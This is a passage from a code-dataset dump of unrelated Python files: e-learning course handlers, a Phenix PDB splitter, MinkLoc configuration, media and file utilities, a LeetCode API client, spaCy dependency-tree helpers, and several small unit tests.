course=course, student=student)\n\n return {\"detail\": \"review has been created.\"}\n\n\nasync def reviews_course_list(*, slug: str) -> List[Dict]:\n \"\"\"Get all reviews.\n\n Args:\n slug: The slug of course.\n\n Returns:\n List of reviews.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n review_list = []\n\n for review in await course.reviews.all():\n student = await review.student\n user = await student.user\n review_list.append(\n {\n \"review\": f\"{review.review}\",\n \"rate\": {review.rate},\n \"user\": {\"username\": user.username},\n }\n )\n\n return review_list\n\n\nasync def create_course_section(*, data: Dict, course: Course,) -> Dict:\n \"\"\"Create course section.\n\n Args:\n data: Dict of data for section creation.\n course: Course instance.\n\n Returns:\n The created section info.\n\n Raises:\n HTTPException: if the same section was created before.\n \"\"\"\n section, created = await Section.get_or_create(**data, course=course)\n\n if not created:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"This section was been created before\",\n )\n\n section.slug = unique_slug(title=section.title)\n await section.save()\n\n return {\n \"title\": section.title,\n \"objective\": section.objective,\n \"order\": section.order,\n \"slug\": section.slug,\n }\n\n\nasync def create_course_announcement(\n *, data: Dict, course: Course, teacher: Teacher\n) -> Dict:\n \"\"\"Create course announcement.\n\n Args:\n data: Dict of data for section creation.\n course: Course instance.\n teacher: Teacher instance.\n\n Returns:\n The created announcement info.\n\n Raises:\n HTTPException: if the same section was created before.\n \"\"\"\n announcement, created = await Announcement.get_or_create(\n **data, course=course, teacher=teacher\n )\n\n if not created:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"This announcement was been created before\",\n )\n\n announcement.slug = unique_slug(title=announcement.title)\n await announcement.save()\n\n return {\n \"title\": announcement.title,\n \"description\": announcement.description,\n \"slug\": announcement.slug,\n }\n\n\nasync def create_section_lecture(*, data: Dict, section_slug: str) -> Dict:\n \"\"\"Create section lecture.\n\n Args:\n data: Dict of data for section creation.\n section_slug: The slug of the section.\n\n Returns:\n The created lecture info.\n\n Raises:\n HTTPException: if the same lecture was created before.\n \"\"\"\n section = await Section.get(slug=section_slug)\n\n lecture, created = await Lecture.get_or_create(**data, section=section)\n\n if not created:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"This lecture was been created before\",\n )\n\n lecture.slug = unique_slug(title=lecture.title)\n await lecture.save()\n\n return {\n \"title\": lecture.title,\n \"text\": lecture.text,\n \"video\": lecture.video,\n \"order\": section.order,\n \"slug\": section.slug,\n }\n\n\nasync def create_section_assignment(*, data: Dict, section_slug: str) -> Dict:\n \"\"\"Create section assignment.\n\n Args:\n data: Dict of data for section creation.\n section_slug: The slug of the section.\n\n Returns:\n The created assignment info.\n\n Raises:\n HTTPException: if the same assignment was created before.\n \"\"\"\n section = await Section.get(slug=section_slug)\n\n assignment, created = await Assignment.get_or_create(**data, section=section)\n\n if not created:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"This assignment was been created before\",\n )\n\n assignment.slug = unique_slug(title=assignment.title)\n await assignment.save()\n\n return {\n \"title\": assignment.title,\n \"text\": assignment.description,\n \"file\": assignment.file,\n \"slug\": section.slug,\n }\n\n\nasync def update_course_settings(*, data: Dict, teacher: Teacher, slug: str) -> Dict:\n \"\"\"Update course settings.\n\n Args:\n data: Dict of data for section creation.\n teacher: Teacher instance.\n slug: Course slug.\n\n Returns:\n The updated settings info.\n \"\"\"\n courses = Course.filter(slug=slug, teacher=teacher)\n await courses.update(**data)\n course = await courses.first()\n\n return {\n \"is_drift\": course.is_drift,\n \"price\": course.price,\n \"discount\": course.discount,\n \"is_active\": course.is_active,\n }\n"} {"ext": "py", "sha": "1a2f29cd7414e2ec385d7c2618051ce26c1d5799", "content": "from __future__ import absolute_import, division, print_function\n# LIBTBX_SET_DISPATCHER_NAME phenix.helix_sheet_recs_as_pdb_files\n\nimport sys\nimport iotbx.pdb\nfrom libtbx.utils import Sorry\n\nlegend = \"\"\"phenix.helix_sheet_recs_as_pdb_files:\n Given PDB file with HELIX/SHEET records output PDB files corresponding to\n each individual HELIX/SHEET record.\n\nHow to run:\n phenix.helix_sheet_recs_as_pdb_files model.pdb\n\nFeedback:\n PAfonine@lbl.gov\n phenixbb@phenix-online.org\"\"\"\n\ndef run(args):\n if(len(args)!=1): raise Sorry(\"PDB file must be provided.\")\n pdb_inp = iotbx.pdb.input(file_name = args[0])\n h = pdb_inp.construct_hierarchy()\n asc = h.atom_selection_cache()\n sso = pdb_inp.extract_secondary_structure()\n for rec in sso.sheets+sso.helices:\n file_name = \"_\".join(rec.as_pdb_str().split())\n file_name = file_name[:min(36, len(file_name))]\n file_name += \".pdb\"\n sel_list = rec.as_atom_selections()\n assert type(sel_list) == list\n if(len(sel_list) == 1):\n sel = asc.selection(string=sel_list[0])\n else:\n sel_str=\" or \".join( [\"(%s)\"%s for s in rec.as_atom_selections()] )\n sel = asc.selection(string=sel_str)\n h_selected = h.select(sel)\n h_selected.write_pdb_file(file_name=file_name)\n\nif (__name__ == \"__main__\"):\n run(args=sys.argv[1:])\n"} {"ext": "py", "sha": "1a2f2b9c17438fe42dde44958a29be9489995353", "content": "# Author: Jacek Komorowski\n# Warsaw University of Technology\n\nimport os\nimport configparser\nimport time\nimport numpy as np\n\n\nclass ModelParams:\n def __init__(self, model_params_path):\n config = configparser.ConfigParser()\n config.read(model_params_path)\n params = config['MODEL']\n\n self.model_params_path = model_params_path\n self.model = params.get('model')\n self.output_dim = params.getint('output_dim', 256) # Size of the final descriptor\n\n # Add gating as the last step\n if 'vlad' in self.model.lower():\n self.cluster_size = params.getint('cluster_size', 64) # Size of NetVLAD cluster\n self.gating = params.getboolean('gating', True) # Use gating after the NetVlad\n\n #######################################################################\n # Model dependent\n #######################################################################\n\n if 'MinkFPN' in self.model:\n # Models using MinkowskiEngine\n self.mink_quantization_size = params.getfloat('mink_quantization_size')\n # Size of the local features from backbone network (only for MinkNet based models)\n # For PointNet-based models we always use 1024 intermediary features\n self.feature_size = params.getint('feature_size', 256)\n if 'planes' in params:\n self.planes = [int(e) for e in params['planes'].split(',')]\n else:\n self.planes = [32, 64, 64]\n\n if 'layers' in params:\n self.layers = [int(e) for e in params['layers'].split(',')]\n else:\n self.layers = [1, 1, 1]\n\n self.num_top_down = params.getint('num_top_down', 1)\n self.conv0_kernel_size = params.getint('conv0_kernel_size', 5)\n\n def print(self):\n print('Model parameters:')\n param_dict = vars(self)\n for e in param_dict:\n print('{}: {}'.format(e, param_dict[e]))\n\n print('')\n\n\ndef get_datetime():\n return time.strftime(\"%Y%m%d_%H%M\")\n\n\ndef xyz_from_depth(depth_image, depth_intrinsic, depth_scale=1000.):\n # Return X, Y, Z coordinates from a depth map.\n # This mimics OpenCV cv2.rgbd.depthTo3d() function\n fx = depth_intrinsic[0, 0]\n fy = depth_intrinsic[1, 1]\n cx = depth_intrinsic[0, 2]\n cy = depth_intrinsic[1, 2]\n # Construct (y, x) array with pixel coordinates\n y, x = np.meshgrid(range(depth_image.shape[0]), range(depth_image.shape[1]), sparse=False, indexing='ij')\n\n X = (x - cx) * depth_image / (fx * depth_scale)\n Y = (y - cy) * depth_image / (fy * depth_scale)\n xyz = np.stack([X, Y, depth_image / depth_scale], axis=2)\n xyz[depth_image == 0] = np.nan\n return xyz\n\n\nclass MinkLocParams:\n \"\"\"\n Params for training MinkLoc models on Oxford dataset\n \"\"\"\n def __init__(self, params_path, model_params_path):\n \"\"\"\n Configuration files\n :param path: General configuration file\n :param model_params: Model-specific configuration\n \"\"\"\n\n assert os.path.exists(params_path), 'Cannot find configuration file: {}'.format(params_path)\n assert os.path.exists(model_params_path), 'Cannot find model-specific configuration file: {}'.format(model_params_path)\n self.params_path = params_path\n self.model_params_path = model_params_path\n # self.model_params_path = model_params_path\n\n config = configparser.ConfigParser()\n\n config.read(self.params_path)\n params = config['DEFAULT']\n self.num_points = params.getint('num_points', 4096)\n self.dataset_folder = params.get('dataset_folder')\n self.queries_folder = params.get('queries_folder')\n\n\n params = config['TRAIN']\n self.num_workers = params.getint('num_workers', 0)\n self.batch_size = params.getint('batch_size', 128)\n\n # Set batch_expansion_th to turn on dynamic batch sizing\n # When number of non-zero triplets falls below batch_expansion_th, expand batch size\n self.batch_expansion_th = params.getfloat('batch_expansion_th', None)\n if self.batch_expansion_th is not None:\n assert 0. < self.batch_expansion_th < 1., 'batch_expansion_th must be between 0 and 1'\n self.batch_size_limit = params.getint('batch_size_limit', 256)\n # Batch size expansion rate\n self.batch_expansion_rate = params.getfloat('batch_expansion_rate', 1.5)\n assert self.batch_expansion_rate > 1., 'batch_expansion_rate must be greater than 1'\n else:\n self.batch_size_limit = self.batch_size\n self.batch_expansion_rate = None\n\n self.lr = params.getfloat('lr', 1e-3)\n\n self.scheduler = params.get('scheduler', 'MultiStepLR')\n if self.scheduler is not None:\n if self.scheduler == 'CosineAnnealingLR':\n self.min_lr = params.getfloat('min_lr')\n elif self.scheduler == 'MultiStepLR':\n scheduler_milestones = params.get('scheduler_milestones')\n self.scheduler_milestones = [int(e) for e in scheduler_milestones.split(',')]\n else:\n raise NotImplementedError('Unsupported LR scheduler: {}'.format(self.scheduler))\n\n self.epochs = params.getint('epochs', 20)\n self.weight_decay = params.getfloat('weight_decay', None)\n self.normalize_embeddings = params.getboolean('normalize_embeddings', True) # Normalize embeddings during training and evaluation\n self.loss = params.get('loss')\n\n if 'Contrastive' in self.loss:\n self.pos_margin = params.getfloat('pos_margin', 0.2)\n self.neg_margin = params.getfloat('neg_margin', 0.65)\n elif 'Triplet' in self.loss:\n self.margin = params.getfloat('margin', 0.4) # Margin used in loss function\n else:\n raise 'Unsupported loss function: {}'.format(self.loss)\n\n self.aug_mode = params.getint('aug_mode', 1) # Augmentation mode (1 is default)\n\n self.train_file = params.get('train_file')\n self.val_file = params.get('val_file', None)\n\n self.eval_database_files = ['kitti_evaluation_database.pickle']\n\n self.eval_query_files = ['kitti_evaluation_query.pickle']\n\n # self.eval_database_files = ['oxford_evaluation_database.pickle', 'business_evaluation_database.pickle',\n # 'residential_evaluation_database.pickle', 'university_evaluation_database.pickle']\n #\n # self.eval_query_files = ['oxford_evaluation_query.pickle', 'business_evaluation_query.pickle',\n # 'residential_evaluation_query.pickle', 'university_evaluation_query.pickle']\n\n assert len(self.eval_database_files) == len(self.eval_query_files)\n\n # Read model parameters\n self.model_params = ModelParams(self.model_params_path)\n\n self._check_params()\n\n def _check_params(self):\n assert os.path.exists(self.dataset_folder), 'Cannot access dataset: {}'.format(self.dataset_folder)\n assert os.path.exists(self.queries_folder), 'Cannot access dataset: {}'.format(self.queries_folder)\n\n def print(self):\n print('Parameters:')\n param_dict = vars(self)\n for e in param_dict:\n if e != 'model_params':\n print('{}: {}'.format(e, param_dict[e]))\n\n self.model_params.print()\n print('')\n\n"} {"ext": "py", "sha": "1a2f2c37335270663f7395928bb8ea6e0ae5090e", "content": "from typing import Any\nfrom pyparsing import Word,nums,CaselessLiteral,ParseException\nfrom subprocess import Popen,PIPE,STDOUT,CREATE_NO_WINDOW\nfrom json import loads\nimport os\nimport errno\n\ndef is_executable()->bool:\n \"\"\"\n Determine if the current script is packaged as an executable\\n\n (EG: If packed into a .exe with PyInstaller)\\n\n returns : True/False, if the script is an executable\n \"\"\"\n import sys\n return getattr(sys,'frozen',False)\n\ndef script_dir()->str:\n \"\"\"\n Get the path to the current script's directory, whether running as an executable or in an interpreter.\\n\n returns : A string containing the path to the script directory.\n \"\"\"\n from os import path\n import sys\n return path.dirname(sys.executable) if is_executable() else os.path.join(path.dirname(path.realpath(sys.argv[0])),'app')\n\ndef local_path(dir_name:str='')->str:\n \"\"\"\n Get the absolute path to a local file/directory __MEIPASS or .), whether running as an executable or in an interpreter.\\n\n returns : A string containing the path to the local file/directory\n \"\"\"\n from os import path\n import sys\n return path.join(sys._MEIPASS, dir_name) if is_executable() else path.join(script_dir(),dir_name)\n\n\ndef convert_size_to_bytes(size_str:str):\n \"\"\"\n Converts a size string (eg: \"12gb\") to bytes.\n \"\"\"\n multipliers={\"kb\":1024,\"mb\":1024000,\"gb\":1024000000,\"tb\":1024000000000} #god help whoever converts a tb file\n expr=Word(nums+','+'.').setParseAction(lambda toks:float(toks[0])).setResultsName('size')+(CaselessLiteral('kb')^ CaselessLiteral('mb') ^ CaselessLiteral('gb') ^ CaselessLiteral('tb')).setParseAction(lambda toks:multipliers[toks[0]]).setResultsName('mult')\n result=None\n try:\n result=expr.parseString(size_str.replace(',',''))\n except ParseException:\n return None\n return result.size*result.mult\n\ndef is_int(s:str):\n \"\"\"\n Return whether or not the str `s` is an int.\n \"\"\"\n try:\n int(s)\n return True\n except ValueError:\n return False\n\n\ndef get_video_info(filename:str,ffprobe:str=os.path.join(local_path('resources'),'ffprobe.exe')):\n \"\"\"\n Get the video info from a video file.\\n\n Returns a JSON object\n \"\"\"\n command = [ffprobe,\n \"-loglevel\", \"quiet\",\n \"-print_format\", \"json\",\n \"-show_format\",\n \"-show_streams\",\n filename\n ]\n pipe = Popen(command, stdout=PIPE, stderr=STDOUT,creationflags = CREATE_NO_WINDOW)\n out, err = pipe.communicate()\n return loads(out)\n\n\ndef get_free_space_b(dirname):\n \"\"\"Return folder/drive free space (in bytes).\"\"\"\n import ctypes\n import os\n import platform\n import sys\n if platform.system() == 'Windows':\n free_bytes = ctypes.c_ulonglong(0)\n ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(dirname), None, None, ctypes.pointer(free_bytes))\n return free_bytes.value\n else:\n st = os.statvfs(dirname)\n return st.f_bavail * st.f_frsize\n\n\ndef vid_time_to_ms(time_str:str):\n h,m,s=time_str.split(':')\n s,ms=s.split('.')\n ms=ms.rstrip('0')\n if not ms:ms='0'\n h,m,s,ms=map(float,(h,m,s,ms))\n ms+=(s*1000)\n ms+=(m*60*1000)\n ms+=(h*60*60*1000)\n return ms\n\nclass Custom_Zip():\n \"\"\"Same basic functionality as zip() builtin, but can be used with differently size iterators\n \"\"\"\n def __init__(self,*args,default:Any=None):\n \"\"\"Same as zip() builtin, but returns default from any iters that are exhausted until all are exhausted\n\n Args:\n default (Any, optional): [description]. Defaults to None.\n \"\"\"\n self.args=[iter(c) for c in args]\n self.default=default\n\n def __iter__(self):\n return self\n \n def __next__(self):\n yields=[]\n for arg in self.args:\n yields.append(next(arg,self.default))\n if all(c is None for c in yields):\n raise StopIteration\n return tuple(yields)\n\ndef make_dirs(path:str):\n \"\"\"Make the directory path specified.\n\n Args:\n path (str): The path to create. Should either be a file (eg: /foo/bar/baz.txt), or a directory ending in / (/foo/bar/)\n \"\"\"\n if not os.path.exists(os.path.dirname(path)):\n try:\n os.makedirs(os.path.dirname(path))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\ndef normalize_extension(ext:str,dot=True):\n if dot: return '.'+ext.lstrip('.')\n else: return ext.lstrip('.')\n\nclass file_str(str):\n \"\"\"Empty subclass of str builtin, for use with type requiring\n \"\"\"\n pass\n\ndef list_get (l:list, idx:int, default:Any=None):\n try:\n return l[idx]\n except IndexError:\n return default"} {"ext": "py", "sha": "1a2f2cb89e3306bc20b285de6f72ed3bd652f1c1", "content": "import functools\nimport json\nimport logging\nimport math\nimport os\nimport time\nfrom functools import cached_property\nfrom typing import Callable, Dict, List, Tuple, Type\n\n# https://github.com/prius/python-leetcode\nimport leetcode.api.default_api # type: ignore\nimport leetcode.api_client # type: ignore\nimport leetcode.auth # type: ignore\nimport leetcode.configuration # type: ignore\nimport leetcode.models.graphql_query # type: ignore\nimport leetcode.models.graphql_query_get_question_detail_variables # type: ignore\nimport leetcode.models.graphql_query_problemset_question_list_variables # type: ignore\nimport leetcode.models.graphql_query_problemset_question_list_variables_filter_input # type: ignore\nimport leetcode.models.graphql_question_detail # type: ignore\nimport urllib3 # type: ignore\nfrom tqdm import tqdm # type: ignore\n\nCACHE_DIR = \"cache\"\n\n\ndef _get_leetcode_api_client() -> leetcode.api.default_api.DefaultApi:\n \"\"\"\n Leetcode API instance constructor.\n\n This is a singleton, because we don't need to create a separate client\n each time\n \"\"\"\n\n configuration = leetcode.configuration.Configuration()\n\n session_id = os.environ[\"LEETCODE_SESSION_ID\"]\n csrf_token = leetcode.auth.get_csrf_cookie(session_id)\n\n configuration.api_key[\"x-csrftoken\"] = csrf_token\n configuration.api_key[\"csrftoken\"] = csrf_token\n configuration.api_key[\"LEETCODE_SESSION\"] = session_id\n configuration.api_key[\"Referer\"] = \"https://leetcode.com\"\n configuration.debug = False\n api_instance = leetcode.api.default_api.DefaultApi(\n leetcode.api_client.ApiClient(configuration)\n )\n\n return api_instance\n\n\ndef retry(times: int, exceptions: Tuple[Type[Exception]], delay: float) -> Callable:\n \"\"\"\n Retry Decorator\n Retries the wrapped function/method `times` times if the exceptions listed\n in `exceptions` are thrown\n \"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n for attempt in range(times - 1):\n try:\n return func(*args, **kwargs)\n except exceptions:\n logging.exception(\n \"Exception occured, try %s/%s\", attempt + 1, times\n )\n time.sleep(delay)\n\n logging.error(\"Last try\")\n return func(*args, **kwargs)\n\n return wrapper\n\n return decorator\n\n\nclass LeetcodeData:\n \"\"\"\n Retrieves and caches the data for problems, acquired from the leetcode API.\n\n This data can be later accessed using provided methods with corresponding\n names.\n \"\"\"\n\n def __init__(self, start: int, stop: int) -> None:\n \"\"\"\n Initialize leetcode API and disk cache for API responses\n \"\"\"\n if start < 0:\n raise ValueError(f\"Start must be non-negative: {start}\")\n\n if stop < 0:\n raise ValueError(f\"Stop must be non-negative: {start}\")\n\n if start > stop:\n raise ValueError(f\"Start (){start}) must be not greater than stop ({stop})\")\n\n self._start = start\n self._stop = stop\n\n @cached_property\n def _api_instance(self) -> leetcode.api.default_api.DefaultApi:\n return _get_leetcode_api_client()\n\n @cached_property\n def _cache(\n self,\n ) -> Dict[str, leetcode.models.graphql_question_detail.GraphqlQuestionDetail]:\n \"\"\"\n Cached method to return dict (problem_slug -> question details)\n \"\"\"\n problems = self._get_problems_data()\n return {problem.title_slug: problem for problem in problems}\n\n @retry(times=3, exceptions=(urllib3.exceptions.ProtocolError,), delay=5)\n def _get_problems_count(self) -> int:\n api_instance = self._api_instance\n\n graphql_request = leetcode.models.graphql_query.GraphqlQuery(\n query=\"\"\"\n query problemsetQuestionList($categorySlug: String, $limit: Int, $skip: Int, $filters: QuestionListFilterInput) {\n problemsetQuestionList: questionList(\n categorySlug: $categorySlug\n limit: $limit\n skip: $skip\n filters: $filters\n ) {\n totalNum\n }\n }\n \"\"\",\n variables=leetcode.models.graphql_query_problemset_question_list_variables.GraphqlQueryProblemsetQuestionListVariables(\n category_slug=\"\",\n limit=1,\n skip=0,\n filters=leetcode.models.graphql_query_problemset_question_list_variables_filter_input.GraphqlQueryProblemsetQuestionListVariablesFilterInput(\n tags=[],\n # difficulty=\"MEDIUM\",\n # status=\"NOT_STARTED\",\n # list_id=\"7p5x763\", # Top Amazon Questions\n # premium_only=False,\n ),\n ),\n operation_name=\"problemsetQuestionList\",\n )\n\n time.sleep(2) # Leetcode has a rate limiter\n data = api_instance.graphql_post(body=graphql_request).data\n\n return data.problemset_question_list.total_num or 0\n\n @retry(times=3, exceptions=(urllib3.exceptions.ProtocolError,), delay=5)\n def _get_problems_data_page(\n self, offset: int, page_size: int, page: int\n ) -> List[leetcode.models.graphql_question_detail.GraphqlQuestionDetail]:\n api_instance = self._api_instance\n graphql_request = leetcode.models.graphql_query.GraphqlQuery(\n query=\"\"\"\n query problemsetQuestionList($categorySlug: String, $limit: Int, $skip: Int, $filters: QuestionListFilterInput) {\n problemsetQuestionList: questionList(\n categorySlug: $categorySlug\n limit: $limit\n skip: $skip\n filters: $filters\n ) {\n questions: data {\n questionFrontendId\n title\n titleSlug\n categoryTitle\n freqBar\n content\n isPaidOnly\n difficulty\n likes\n dislikes\n topicTags {\n name\n slug\n }\n stats\n hints\n }\n }\n }\n \"\"\",\n variables=leetcode.models.graphql_query_problemset_question_list_variables.GraphqlQueryProblemsetQuestionListVariables(\n category_slug=\"\",\n limit=page_size,\n skip=offset + page * page_size,\n filters=leetcode.models.graphql_query_problemset_question_list_variables_filter_input.GraphqlQueryProblemsetQuestionListVariablesFilterInput(),\n ),\n operation_name=\"problemsetQuestionList\",\n )\n\n time.sleep(2) # Leetcode has a rate limiter\n data = api_instance.graphql_post(\n body=graphql_request\n ).data.problemset_question_list.questions\n\n return data\n\n def _get_problems_data(\n self,\n ) -> List[leetcode.models.graphql_question_detail.GraphqlQuestionDetail]:\n problem_count = self._get_problems_count()\n\n if self._start > problem_count:\n raise ValueError(\n \"Start ({self._start}) is greater than problems count ({problem_count})\"\n )\n\n start = self._start\n stop = min(self._stop, problem_count)\n\n page_size = min(3000, stop - start + 1)\n\n problems: List[\n leetcode.models.graphql_question_detail.GraphqlQuestionDetail\n ] = []\n\n logging.info(f\"Fetching {stop - start + 1} problems {page_size} per page\")\n\n for page in tqdm(\n range(math.ceil((stop - start + 1) / page_size)),\n unit=\"problem\",\n unit_scale=page_size,\n ):\n data = self._get_problems_data_page(start, page_size, page)\n problems.extend(data)\n\n return problems\n\n async def all_problems_handles(self) -> List[str]:\n \"\"\"\n Get all problem handles known.\n\n Example: [\"two-sum\", \"three-sum\"]\n \"\"\"\n return list(self._cache.keys())\n\n def _get_problem_data(\n self, problem_slug: str\n ) -> leetcode.models.graphql_question_detail.GraphqlQuestionDetail:\n \"\"\"\n TODO: Legacy method. Needed in the old architecture. Can be replaced\n with direct cache calls later.\n \"\"\"\n cache = self._cache\n if problem_slug in cache:\n return cache[problem_slug]\n\n async def _get_description(self, problem_slug: str) -> str:\n \"\"\"\n Problem description\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.content or \"No content\"\n\n async def _stats(self, problem_slug: str) -> Dict[str, str]:\n \"\"\"\n Various stats about problem. Such as number of accepted solutions, etc.\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return json.loads(data.stats)\n\n async def submissions_total(self, problem_slug: str) -> int:\n \"\"\"\n Total number of submissions of the problem\n \"\"\"\n return int((await self._stats(problem_slug))[\"totalSubmissionRaw\"])\n\n async def submissions_accepted(self, problem_slug: str) -> int:\n \"\"\"\n Number of accepted submissions of the problem\n \"\"\"\n return int((await self._stats(problem_slug))[\"totalAcceptedRaw\"])\n\n async def description(self, problem_slug: str) -> str:\n \"\"\"\n Problem description\n \"\"\"\n return await self._get_description(problem_slug)\n\n async def difficulty(self, problem_slug: str) -> str:\n \"\"\"\n Problem difficulty. Returns colored HTML version, so it can be used\n directly in Anki\n \"\"\"\n data = self._get_problem_data(problem_slug)\n diff = data.difficulty\n\n if diff == \"Easy\":\n return \"Easy\"\n\n if diff == \"Medium\":\n return \"Medium\"\n\n if diff == \"Hard\":\n return \"Hard\"\n\n raise ValueError(f\"Incorrect difficulty: {diff}\")\n\n async def paid(self, problem_slug: str) -> str:\n \"\"\"\n Problem's \"available for paid subsribers\" status\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.is_paid_only\n\n async def problem_id(self, problem_slug: str) -> str:\n \"\"\"\n Numerical id of the problem\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.question_frontend_id\n\n async def likes(self, problem_slug: str) -> int:\n \"\"\"\n Number of likes for the problem\n \"\"\"\n data = self._get_problem_data(problem_slug)\n likes = data.likes\n\n if not isinstance(likes, int):\n raise ValueError(f\"Likes should be int: {likes}\")\n\n return likes\n\n async def dislikes(self, problem_slug: str) -> int:\n \"\"\"\n Number of dislikes for the problem\n \"\"\"\n data = self._get_problem_data(problem_slug)\n dislikes = data.dislikes\n\n if not isinstance(dislikes, int):\n raise ValueError(f\"Dislikes should be int: {dislikes}\")\n\n return dislikes\n\n async def tags(self, problem_slug: str) -> List[str]:\n \"\"\"\n List of the tags for this problem (string slugs)\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return list(map(lambda x: x.slug, data.topic_tags))\n\n async def freq_bar(self, problem_slug: str) -> float:\n \"\"\"\n Returns percentage for frequency bar\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.freq_bar or 0\n\n async def title(self, problem_slug: str) -> float:\n \"\"\"\n Returns problem title\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.title\n\n async def category(self, problem_slug: str) -> float:\n \"\"\"\n Returns problem category title\n \"\"\"\n data = self._get_problem_data(problem_slug)\n return data.category_title\n"} {"ext": "py", "sha": "1a2f2cfb3c68197b9fa17b3a971cc500b4db60d7", "content": "from unittest import TestCase\n\nfrom core_get.cli.parse.options_parsers.login_options_parser import LoginOptionsParser\nfrom test.cli.parse.options_parsers.options_parser_test_helper import do_test_parse\n\n\nclass TestLoginOptionsParser(TestCase):\n def test_parses_access_token_correctly(self):\n login_options = do_test_parse(LoginOptionsParser, 'abc123')\n self.assertEqual('abc123', login_options.access_token)\n\n def test_fails_with_no_access_token(self):\n with self.assertRaises(SystemExit):\n do_test_parse(LoginOptionsParser)\n"} {"ext": "py", "sha": "1a2f2e10a41167a2443b155206a8a8b98bdeb8c0", "content": "import pytest\nimport saltext.credstash.sdbs.credstash as credstash_sdb\n\n\n@pytest.fixture\ndef configure_loader_modules():\n module_globals = {\n \"__salt__\": {\"this_does_not_exist.please_replace_it\": lambda: True},\n }\n return {\n credstash_sdb: module_globals,\n }\n\n\ndef test_replace_this_this_with_something_meaningful():\n assert \"this_does_not_exist.please_replace_it\" in credstash_sdb.__salt__\n assert credstash_sdb.__salt__[\"this_does_not_exist.please_replace_it\"]() is True\n"} {"ext": "py", "sha": "1a2f2e80c1717f84fc8c387bdf21036ed14f254e", "content": "import itertools\nimport networkx as nx\nfrom spacy.tokens import Token\n\n\ndef syntactic_depth(token):\n '''Finds token depth in the syntactic tree'''\n\n if token._._syntactic_depth is None:\n depth = 0\n current_word = token\n while not current_word == current_word.head:\n depth += 1\n current_word = current_word.head\n token._._syntactic_depth = depth\n return token._._syntactic_depth\n\nToken.set_extension('_syntactic_depth', default=None, force=True)\nToken.set_extension('syntactic_depth', getter=syntactic_depth, force=True)\n\ndef filter_by_depth(depths, tokens):\n if isinstance(depths, int):\n depths = set([depths])\n return [t for t in tokens if t._.syntactic_depth in depths]\n\n\ndef shallowest_token(tokens):\n tokens = sort_by_depth(tokens)\n return tokens[0]\n\n\ndef sort_by_depth(tokens):\n return sorted(tokens, key=lambda w: (w._.syntactic_depth, w.i))\n\n\ndef sort_by_idx(tokens):\n return sorted(tokens, key=lambda w: w.i)\n\n\ndef siblings(token, side=None):\n try:\n siblings = token.head.children\n except:\n return []\n if side == 'left':\n siblings = [s for s in siblings if s.i < token.i]\n elif side == 'left':\n siblings = [s for s in siblings if s.i > token.i]\n return siblings\n\n\ndef doc_to_nx_graph(doc):\n edges = []\n for token in doc:\n for child in token.children:\n edges.append(('{0}-{1}'.format(token.text, token.i),\n '{0}-{1}'.format(child.text, child.i)))\n graph = nx.Graph(edges)\n return graph\n\n\ndef shortest_dependency_path(nx_graph, doc, source, target):\n source = '{0}-{1}'.format(source.text, source.i)\n target = '{0}-{1}'.format(target.text, target.i)\n try:\n path = nx.shortest_path(nx_graph, source=source, target=target)\n except nx.exception.NetworkXNoPath:\n path = []\n dep_path = []\n for node in path:\n idx = int(node.split('-')[-1])\n token = doc[idx]\n dep_path.append(token)\n dep_path = sorted(dep_path, key=lambda t: t._.syntactic_depth)\n return dep_path\n\n\ndef smallest_connected_subgraph(with_tokens, doc, nx_graph=None):\n # Find root nodes\n if not nx_graph:\n nx_graph = doc_to_nx_graph(doc)\n min_depth = min([t._.syntactic_depth for t in with_tokens])\n roots = [t for t in with_tokens if t._.syntactic_depth == min_depth]\n non_roots = [t for t in with_tokens if t not in roots]\n tokens_touched = roots + non_roots\n # For each non-root token, trace paths to each root. This will touch every non-root token we're looking for\n for token in non_roots:\n for root in roots:\n path = shortest_dependency_path(nx_graph, doc, token, root)\n for t in path:\n if t not in tokens_touched:\n tokens_touched.append(t)\n tokens_touched = sorted(tokens_touched, key=lambda t: t.i)\n # Trace paths between roots\n for root_x, root_y in itertools.combinations(roots, 2):\n path = shortest_dependency_path(nx_graph, doc, root_x, root_y)\n for t in path:\n if t not in tokens_touched:\n tokens_touched.append(t)\n return tokens_touched\n\n\ndef idxs_to_tokens(doc, idxs):\n return [doc[idx] for idx in idxs]\n\n\ndef token_idxs(tokens):\n return [t.i for t in tokens]\n\n\ndef de_duplicate_list(list_):\n unique_list = []\n for item in list_:\n if item not in unique_list:\n unique_list.append(item)\n return unique_list\n\n\ndef list_contains_duplicates(list_):\n unique_list = de_duplicate_list(list_)\n if len(list_) > len(unique_list):\n return True\n return False\n\n\ndef features_are_in_pattern(features, pattern):\n for pattern_element in pattern:\n for feature in features:\n if feature not in pattern_element['PATTERN']:\n return False\n return True\n\n\ndef flatten_list(list_):\n return list(itertools.chain(*list_))\n"} {"ext": "py", "sha": "1a2f2ee6eadc803b23db8246082ac439cb839c0c", "content": "import pytest\nfrom tests.mocks import MockOktaClient\nimport okta.models as models\nfrom http import HTTPStatus\nfrom okta.errors.okta_api_error import OktaAPIError\n\n\nclass TestTrustedOriginsResource:\n \"\"\"\n Integration Tests for the Trusted Origins Resource\n \"\"\"\n SDK_PREFIX = \"python_sdk\"\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_create_get_origin(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n 